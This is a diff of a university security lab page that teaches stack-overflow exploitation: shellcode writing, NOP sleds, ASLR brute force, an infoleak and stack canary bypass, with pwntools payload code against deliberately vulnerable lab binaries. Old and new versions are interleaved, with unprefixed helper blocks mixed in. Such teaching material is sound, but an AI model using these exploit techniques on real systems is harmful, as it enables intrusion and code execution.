-| 0xffffcecc ("A-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffced0 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffced4 ("AA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Breakpoint 1, 0x08048422 in main ()
+io.interactive()
 </code>
-<code bash>
+Let's try to run ''exploit-t2.py'':
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12) + '\xb8\xce\xff\xff'" > payload
+<code>
+$ python exploit-t2.py
+[+] Starting local process './vulnerable': Done
+[*] Switching to interactive mode
+[*] Got EOF while reading in interactive
+$ ls /
+[*] Process './vulnerable' stopped with exit code -11
+[*] Got EOF while sending in interactive
 </code>
-Now test the payload in gdb! Break at **ret** and see the control flow continuing on the stack and executing exit.
+This most probably crashed the program. Indeed, if we look at ''dmesg'', we will see something along the lines of:
-Then try running the experiment outside of gdb. Does it still work? Why or why not?
+<code>
+$ dmesg | tail
+[31758.336503] vulnerable[53539]: segfault at 15 ip 00007fffffffeb9a sp 00007fffffffed30 error
+
+</code>
-In order to circumvent frustration, we've leaked the stack address of the buffer in the binary.
+So we don't know //exactly// what happened((We can decode the error code using information in the [[http://lxr.free-electrons.com/source/arch/x86/mm/fault.c#L30|Linux kernel source code]]. Error code ''6'' corresponds to a failed user space write operation, but that doesn't help much.)), but we know that most probably the code at ''0x7fffffffeba4'' isn't what we expected. Since finding the exact address is difficult in the absence of an information leak, we could just extend our shellcode by prepending a **NOP sled** to it:
-===== Tips & Tricks =====
+<code python>
+nopsled = b"\x90" * 2000
+io = process('./vulnerable', env= { 'SHELLCODE' : nopsled + shellcode })
+target = io.corefile.env["SHELLCODE"]
-==== Loop forever ====
+# Craft payload.
+payload = b"A" * ret_offset
+payload += pack(target)
-Sometimes, you won't have access to the binary and only have a leaked address of some description. You can add this instruction in your shellcode
+</code>
-<code asm>
+Running this gives us a shell:
-jmp 0x0
+<code>
+$ python exploit-t2.py
+[+] Starting local process './vulnerable': Done
+[*] Switching to interactive mode
+$ ls /
+bin   home          lib32      media  root  sys  vmlinuz
+boot  initrd.img      lib64      mnt     run   tmp  vmlinuz.old
+dev   initrd.img.old  libx32      opt     sbin  usr
+etc   lib          lost+found  proc     srv   var
+$
 </code>
-and vary the overwritten return address. If the program stops responding, then it means that it has reached your shellcode.
-==== NOP sled ====
-Stack addresses aren't always stable. To circumvent is, buffer space permitting, you can inject a large number of 'nop' instructions (no operation) prior to the actual shellcode. In this way, if you return to any of the injected nop instructions, the execution flow will reach your shellcode. To better illustrate:
+===== Tasks =====
-{{http://photos1.blogger.com/blogger/1619/2480/1600/buffer_over5.jpg}}
+==== 1. Brute-force ASLR bypass  ====
-==== Keeping stdin open ====
+First, make sure ASLR is enabled:
-Your exploit may spawn a shell, and yet it shuts off instantly. That's because the newly spawned shell isn't waiting on any input. A workaround to this problem is to append **stdin** to the payload, as follows:
+<code>
+$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
+
+</code>
+**The task** is to upgrade the exploitation script to **brute-force ASLR**. Take a look at the tips below if you get stuck.
+<note tip>
+Bypassing ASLR through brute-force is possible only because ''bruteforce'' is a 32-bit binary, although this technique is technically speaking possible on 64-bit if the attacker can leak //address bits//. The key question to ask here is, **how many bits of entropy** does ASLR yield on our architecture?
+We can find the answer quickly through empirical means. We've included a program called ''buf.c'' in the [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]], which intentionally leaks a stack address. Let's compile it and give it a few runs:
-<code bash>
+<code>
-cat payload - | ./vuln
+$ make buf
+...
+$ for i in $(seq 1 20); do ./buf; done
+0xff98382c
+0xffa79b0c
+0xfffc01bc
+0xfff26d5c
+0xffaa8cfc
+0xffa6c58c
+0xffb05dec
+0xff8578bc
+0xff84554c
+0xffa9d39c
+0xffb61d5c
+0xffb76cfc
+0xffb5363c
+0xff9c4edc
+0xffc8a29c
+0xffa956dc
+0xffe8d0cc
+0xff9b024c
+0xffc2b93c
+0xffa579cc
 </code>
-In this way, after the shell spawns, you can interact with it.
+Looking at the addresses above (btw, remember the memory dump analysis task from [[cns:labs:lab-03|Lab 03]]?), we can see that the //most significant byte// is always ''0xff'', while the //least significant nibble// (4-bit value) is always ''0xc''. This means 12 address bits are fixed, which leaves us with ''32 - 12 = 20'' random address bits.
-===== Tasks =====
+/*
-==== 1. write [2p] ====
+So filling the stack with a payload which is ''2^20 = 1MB'' in size should in theory guarantee us that our attack is reliable. In practice this is not so easy, because
-Using the same vulnerable binary, write a shellcode which performs the following:
+*/
-<code C>
-write(1, "Hello World!\n", 13);
+The total size of the environment variables is limited by ''%%ARG_MAX%%'' (also see the "Limits on size of arguments and environment" section in the [[http://man7.org/linux/man-pages/man2/execve.2.html|execve manpage]]):
+<code>
+$ getconf ARG_MAX
+2097152
 </code>
-Again, inspect the Linux x86 ABI.
+So we have about 2MB for //all the arguments and environment variables//, which doesn't give us a fully reliable attack surface, but it easily provides trial-and-error potential.
+We recommend you use something around ''100000'' bytes (a.k.a. ''100k'' bytes) for the NOP sled. A Python construct such as the following will do:
+<code>
+nopsled = "\x90" * 100000
+</code>
+</note>
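To get a feel for how many attempts a brute-force run may need, here is a back-of-the-envelope estimate. It relies on a simplified model that is our assumption, not something measured in the lab: every guess is uniform over the ''0xff000000''-''0xffffffff'' range (20 free bits plus 4 fixed low bits), and a guess succeeds whenever it lands inside a 100000-byte NOP sled that lies fully within that range.

```python
import math

SLED_SIZE = 100000        # NOP sled size recommended in the tip, in bytes
RANGE_SIZE = 1 << 24      # 0xff000000..0xffffffff: 20 free bits + 4 fixed low bits


def hit_probability(sled_size, range_size):
    """Chance that one uniformly random guess lands inside the sled."""
    return float(sled_size) / range_size


def tries_for_confidence(p, confidence):
    """Independent tries needed to succeed at least once with the given probability."""
    return int(math.ceil(math.log(1.0 - confidence) / math.log(1.0 - p)))


p = hit_probability(SLED_SIZE, RANGE_SIZE)
print("per-try hit probability: {:.4%}".format(p))
print("expected number of tries: {:.0f}".format(1.0 / p))
print("tries for a 99% chance of success: {}".format(tries_for_confidence(p, 0.99)))
```

Under these assumptions a hit takes on the order of a couple of hundred tries on average, which is why a simple loop is practical on a 32-bit target.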
 <note tip>
-If you find yourself running out of shellcode space, remember that there's plenty of space //after// the return address ;-)
+Note that simply increasing the NOP sled size isn't enough. You still need to randomize the target return address using [[https://docs.python.org/2/library/random.html|Python's random]]. The target format is exactly the one explained in the previous tip: ''ff'' + 20 random bits + ''8'' (although the least significant nibble could be any multiple of 4 in principle).
 </note>
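A minimal sketch of the address generation described in the tip, using only the standard library (''struct.pack("<I", ...)'' plays the role that ''p32'' plays in pwntools). The helper names ''random_stack_address'' and ''pack32'' are hypothetical.

```python
import random
import struct


def random_stack_address(low_nibble=0x8):
    """Build a guess of the form 0xff + 20 random bits + low_nibble."""
    middle = random.getrandbits(20)
    return (0xff << 24) | (middle << 4) | (low_nibble & 0xf)


def pack32(addr):
    """Pack a 32-bit address as 4 little-endian bytes, the layout x86 expects."""
    return struct.pack("<I", addr)


addr = random_stack_address()
print("trying return address 0x{:08x} -> {!r}".format(addr, pack32(addr)))
```

Generating a fresh address on every loop iteration is what turns a single unlucky guess into a sequence of independent attempts.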
 <note tip>
-You will also need to push the "Hello World!\n" string onto the stack. You can use the following hack in order to do this:
+Some Python tips:
-<code asm>
+  * You can simply run the payload injection and random generation in a ''while True'' loop
-call label
+  * The process will simply return an ''EOF'' when it ''SIGSEGV''s. You can do a timed-out ''recv'' (see [[http://docs.pwntools.com/en/stable/tubes.html#pwnlib.tubes.tube.tube.recv|pwntools' processes]]) in a [[https://docs.python.org/2.7/tutorial/errors.html#handling-exceptions|''try/except'' block]] that only launches the interactive shell when we know the child process hasn't closed its end of the pipe.
-db "Hello World", 0xa
+  * When an ''EOF'' occurs, make sure to terminate the process/tube and close its descriptors in order to free resources. Use<code>
+io.terminate()
+io.wait()
+io.close()
 </code>
+</note>
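The "did the child survive?" check from the tips can also be sketched with the standard library alone, which may help in seeing what the pwntools calls are doing. This is an illustration rather than the lab's reference solution: ''try_once'' and ''cleanup'' are hypothetical helpers, ''subprocess'' stands in for a pwntools ''process'' tube, and the two child commands are harmless stand-ins for a crashing and a surviving target.

```python
import subprocess
import sys


def cleanup(proc):
    """Kill the child if it is still running, reap it, and close our end of the pipe."""
    if proc.poll() is None:
        proc.kill()
    proc.wait()
    try:
        proc.stdin.close()
    except BrokenPipeError:
        pass  # unflushed data for a child that is already gone


def try_once(cmd, payload, timeout=1.0):
    """Run cmd and send payload; return the live process, or None if it exited in time."""
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        proc.stdin.write(payload)
        proc.stdin.flush()
    except BrokenPipeError:
        pass  # the child died before reading everything
    try:
        proc.wait(timeout=timeout)
    except subprocess.TimeoutExpired:
        return proc  # still alive after the timeout: worth going interactive
    cleanup(proc)
    return None


# Stand-in children: one exits at once (like a crash), one blocks on stdin (like a shell).
dead = try_once([sys.executable, "-c", "raise SystemExit(1)"], b"AAAA", timeout=5.0)
alive = try_once([sys.executable, "-c", "import sys; sys.stdin.read()"], b"AAAA", timeout=0.5)
print("first child survived:", dead is not None)
print("second child survived:", alive is not None)
if alive is not None:
    cleanup(alive)
```

In a brute-force loop, a ''None'' result means "try again with a new address", and every failed attempt is cleaned up before the next one starts so that descriptors don't pile up.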
-The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
+<note tip>
+While running the exploit script (using ''pwntools'') you may end up getting a shell prompt, typing ''ls'' or some other command, and seeing nothing happen. That's because ''pwntools'' didn't time out on the receive and served you a prompt, even though execution never actually reached the shellcode. Let the script keep running until it does reach the shellcode; a shell will then be spawned and all your commands (such as ''ls'') will work.
 </note>
+==== 2. Stackbleed: infoleak + ASLR bypass  ====
-==== 2. execve [3p] ====
+Examine ''stackbleed.c''; ''%%get_user_input%%'' calls ''read'' twice:
-Now for the real challenge, write a shellcode which actually spawns a shell. The equivalent C call is the following:
 <code C>
-execve('/bin/sh', ['/bin/sh'], 0);
+void get_user_input(void)
+{
+	char *env = getenv("SHELLCODE");
+	char buf[BUFFER_SIZE];
+	read(STDIN_FILENO, buf, BUFFER_SIZE);
+	printf("%s\n", buf);
+	read(STDIN_FILENO, buf, 12*BUFFER_SIZE);
+}
 </code>
-Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'.
+The first ''read'' is seemingly correct, but it has one big problem: it doesn't append the string's ''NUL'' terminator, so the ''printf'' right after it keeps reading past ''buf'' and can easily leak ''env''. Let's give it a try:
+<code>
+$ python -c 'import sys; sys.stdout.write("ABCD")' | SHELLCODE="\x90\x90\x90\x90" ./stackbleed | xxd
+00000000: 4142 4344 d90f d3ff 010a                 ABCD......
+</code>
+We can safely assume that the bytes ''d90fd3ff'' are in fact the value in ''env'' (''0xffd30fd9'').
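The byte-order conversion can be checked with a few lines of Python. The sketch below feeds the bytes from the ''xxd'' dump into a hypothetical ''extract_leak'' helper; in an automated exploit the same logic would be applied to whatever the process sends back after the first write.

```python
import struct


def extract_leak(output, sent_len):
    """Return the 32-bit little-endian value that follows the sent_len echoed bytes."""
    raw = output[sent_len:sent_len + 4]
    if len(raw) != 4:
        raise ValueError("output too short to contain a 4-byte leak")
    return struct.unpack("<I", raw)[0]


# Bytes taken from the xxd dump: "ABCD", the leaked pointer, then trailing bytes.
output = bytes.fromhex("41424344d90fd3ff010a")
env_addr = extract_leak(output, len(b"ABCD"))
print("SHELLCODE is at 0x{:08x}".format(env_addr))
```

The value will differ on every run while ASLR is enabled, so the leak has to be read and used within the same process instance.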
+**The task**: using the infrastructure from the tutorial and the previous tasks, build an automated exploit that uses this infoleak to jump to the address of ''SHELLCODE''.
 <note tip>
-You need to get the string '/bin/sh' on the stack. You can do this using two **push** instructions. Since the string is 7 bytes long, you can add one more, either '%%//%%bin/sh', or '/bin%%//%%sh'.
+Since the attacker needs to be precise about how many characters they write in the first phase, they are better served by ''send'', instead of ''sendline''. Consult the [[http://docs.pwntools.com/en/stable/tubes.html|pwnlib tubes]] documentation for more details.
 </note>
 <note tip>
-You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly.
+When computing the offset from the start of ''buf'' to the return address please note that the first ''read()'' call reads ''4'' bytes and then the second ''read()'' call reads again starting from ''buf''.
 </note>
-==== 3. execve with no zeros [2p] ====
-Inspect the code of vuln2.asm. What changed? How is your input passed?
+<note>
+In order to unpack a byte string address to an integer and print it, you can use the [[http://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack|unpack() functionality in pwn]] similar to the code below:
+<code>
+log.info("Canary is: 0x{:08x}".format(unpack(canary, 'all', endian='little', sign=False)))
+</code>
-Some functions, such as **strcpy**, **sprintf** and **strcat** stop whenever a NULL byte is reached. If you inspect your previous shellcodes using **xxd**, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
+Or, if you set the context properly (e.g. ''context.binary = "./stackbleed"''), you can skip the arguments to ''unpack'':
+<code>
+log.info("Canary is: 0x{:08x}".format(unpack(canary)))
+</code>
+</note>
+==== 3. Extra: infoleak + stack canary bypass  ====
-However, there's more than one way <del>to skin a cat</del> to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit **vuln2**.
+Examine ''canary.c'' and the resulting ''canary'' executable file. It is once again very similar to the previous incarnations, but we will use it for something somewhat different: leaking the stack canary and bypassing it.
+Knowing that ''buf'''s size is 4, we want to determine exactly where the canary value starts. For now, let's take a look at ''vulnerable3'' with GDB:
-<note tip>
-**Some common replacements**
 <code asm>
-mov <reg>, 0 <-> xor <reg>, <reg>
+$ gdb -q ./canary
-mov <reg>, value <-> push value, pop <reg>
+Reading symbols from ./vulnerable3...done.
+gdb-peda$ pdis get_user_input
+Dump of assembler code for function get_user_input:
+   0x0804848b <+0>:	push   ebp
+   0x0804848c <+1>:	mov    ebp,esp
+   0x0804848e <+3>:	sub    esp,0x18
+   0x08048491 <+6>:	mov    eax,gs:0x14
+   0x08048497 <+12>:	mov    DWORD PTR [ebp-0xc],eax
+...
+   0x080484c9 <+62>:	call   0x8048340 <read@plt>
+   0x080484ce <+67>:	add    esp,0x10
+   0x080484d1 <+70>:	nop
+   0x080484d2 <+71>:	mov    eax,DWORD PTR [ebp-0xc]
+   0x080484d5 <+74>:	xor    eax,DWORD PTR gs:0x14
+   0x080484dc <+81>:	je     0x80484e3 <get_user_input+88>
+   0x080484de <+83>:	call   0x8048350 <__stack_chk_fail@plt>
+   0x080484e3 <+88>:	leave
+   0x080484e4 <+89>:	ret
+End of assembler dump.
 </code>
+Looking at the prologue and epilogue, we see that the following operations are included:
+  * A move into ''eax'' (and then on the stack) of a value coming from ''gs:0x14''.
+  * The comparison of the value on the stack with the reference in ''gs:0x14''.
+Let's take a look at that value by breakpointing at the instruction right after the ''eax'' assignment:
+<code>
+gdb-peda$ b *0x08048497
+Breakpoint 1 at 0x8048497: file canary.c, line 8.
+gdb-peda$ r < <(echo -n "AAAA\n")
+...
+gdb-peda$ print $eax
+$1 = 0xe27b7000
+</code>
+The canary value is ''0xe27b7000'' but it will differ at each run. One observation is that the canary value will almost always start with a least-significant ''NUL'' byte (i.e. ''%%'\0'%%''). This is actually meant to protect against ''printf''-based information leaks, so let's experiment a bit:
+<code>
+$ # we give "ABCD" as an input
+$ python -c 'import sys; sys.stdout.write("ABCD")' | ./canary | xxd
+00000000: 4142 4344 0a                             ABCD.
+$ # we give "ABCD\n" as an input
+$ python -c 'import sys; sys.stdout.write("ABCD\n")' | ./canary | xxd
+*** stack smashing detected ***: ./canary terminated
+...
+00000000: 4142 4344 0a7e 3d76 010a                 ABCD.~=v..
+</code>
+In the first run we sent 4 bytes as input, but were unable to leak the canary value since it starts with a ''NUL'' byte and the ''printf'' call stops there. In the second run we've overwritten the ''NUL'' byte with the newline character (''\n'', ''0xa''), so ''printf'' carries on and prints the remaining canary bytes.
+**Your task** is to inject an input that leaks the canary value, then, in the second ''read'', write the leaked value back over the canary and overwrite the return address so that the program triggers a ''SIGSEGV'' at ''0x45454545''.
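The canary can be rebuilt from the second dump by putting the ''NUL'' byte back in place of the newline we sent. The sketch below does this for the bytes shown by ''xxd''; ''recover_canary'' is a hypothetical helper, and it assumes (as the experiment suggests) that the canary sits right after the 4-byte ''buf''.

```python
import struct


def recover_canary(output, sent_len):
    """Rebuild the canary, given that the last byte we sent overwrote its low NUL byte."""
    # Our last sent byte sits where the canary's NUL was; its other 3 bytes follow.
    tail = output[sent_len:sent_len + 3]
    if len(tail) != 3:
        raise ValueError("output too short to contain the canary bytes")
    return struct.unpack("<I", b"\x00" + tail)[0]


# Bytes taken from the second xxd dump: "ABCD\n", three canary bytes, trailing bytes.
output = bytes.fromhex("414243440a7e3d76010a")
canary = recover_canary(output, len(b"ABCD\n"))
print("canary is 0x{:08x}".format(canary))
```

Like the value seen in GDB, the recovered canary ends in ''00'' and changes on every run.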
+<note>
+The "least-significant ''NUL''-byte" rule is more of an assumption we're making than an actual principle. Sometimes the randomly-chosen canary values may also contain ''NUL'' bytes in other positions, in which case our approach won't work too well. Still, any extra byte that we guess is a step towards a bypass.
 </note>
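A possible layout for the second-stage input, derived from the disassembly: the canary lives at ''ebp-0xc'', so 8 more bytes separate it from the saved ''ebp'', which is followed by the return address. The sketch assumes that ''buf'' occupies the 4 bytes directly below the canary; ''build_payload'' is a hypothetical helper, and the canary used in the example is the one from the dump, which will differ on your run.

```python
import struct

BUF_SIZE = 4         # size of buf, as stated in the task text
CANARY_TO_EBP = 8    # ebp-0x8 and ebp-0x4, between the canary (ebp-0xc) and saved ebp


def build_payload(canary, ret_addr):
    """Fill buf, restore the canary, pad up to and over saved ebp, then set the return address."""
    payload = b"A" * BUF_SIZE
    payload += struct.pack("<I", canary)      # must match gs:0x14 or __stack_chk_fail fires
    payload += b"B" * CANARY_TO_EBP
    payload += b"C" * 4                       # saved ebp
    payload += struct.pack("<I", ret_addr)    # where ret will jump
    return payload


payload = build_payload(0x763d7e00, 0x45454545)
print(repr(payload))
```

Because the second stage is consumed by ''read'' rather than by a string function, the ''NUL'' byte inside the canary does not cut the input short.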
-==== 4. Ending with style: pwntools [3p] ====
+==== 4. Extra: infoleak + stack canary + ASLR bypass  ====
+Now that you've learned about bypassing ASLR (through brute force) and bypassing the stack canary through an information leak, combine the exploit from [[#brute-force_aslr_bypass_3p|Task 1: Brute-force ASLR bypass]] with the one from [[#extrainfoleak_stack_canary_bypass_2p|Task 3: infoleak + stack canary bypass]] and exploit ''vulnerable3'' to get a shell.
+<note tip>
+You will use the random generation and loop for starting a process tube from [[#brute-force_aslr_bypass_3p|Task 1: Brute-force ASLR bypass]] with the information leak and payload crafting from [[#extrainfoleak_stack_canary_bypass_2p|Task 3: infoleak + stack canary bypass]].
+</note>
+===== Resources =====
-Lastly, let's use [[https://github.com/Gallopsled/pwntools|pwntools]] to do most of the work for us and exploit **vuln** once more. Fill in the values in **skel_pwn.py** and run the script.
+  * [[http://phrack.org/issues/59/9.html#article|Bypassing PaX ASLR protection]]
+  * [[http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx|Stack Overflows - Defeating Canaries, ASLR, DEP, NX]]
+  * [[https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/|Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR]]
+  * [[https://lwn.net/Articles/584225/|"Strong" stack protection for GCC]]
+  * [[http://wiki.osdev.org/Stack_Smashing_Protector|Stack Smashing Protector]]
+  * Python: [[https://docs.python.org/2/library/random.html|random]], [[https://docs.python.org/2/library/subprocess.html|subprocess]]
+  * pwntools: [[http://docs.pwntools.com/en/stable/tubes/processes.html|Processes]], [[http://docs.pwntools.com/en/stable/tubes.html|tubes]]
+  * [[http://man7.org/linux/man-pages/man2/execve.2.html|man execve]]


cns/labs/lab-06.1510507680.txt.gz · Last modified: 2017/11/12 19:28 by irina.presa
